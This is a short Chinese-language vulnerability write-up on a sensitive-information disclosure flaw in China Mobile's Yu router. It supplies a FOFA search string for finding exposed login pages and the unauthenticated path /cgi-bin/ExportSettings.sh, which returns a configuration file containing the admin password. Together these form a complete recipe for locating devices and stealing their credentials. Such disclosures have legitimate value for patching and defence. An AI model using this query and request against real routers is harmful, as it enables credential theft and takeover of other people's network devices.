# 中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞，攻击者通过漏洞获取配置文件，其中包含账号密码等敏感信息

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

中国移动 禹路由

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

title="互联世界 物联未来-登录"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhrYbLZtHHSDhh51TEl%2F-Mhr_GE5Jm89BB8r2fnw%2Fimage.png?alt=media\&token=cd680cf5-fc8e-4019-8eeb-e037d09ee508)

访问Url

```
/cgi-bin/ExportSettings.sh
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhrYbLZtHHSDhh51TEl%2F-Mhr_JGL15H3uGwojtre%2Fimage.png?alt=media\&token=8d94ce3c-c358-4d12-8eed-6a2ccf247a1e)

其中password为登录后台密码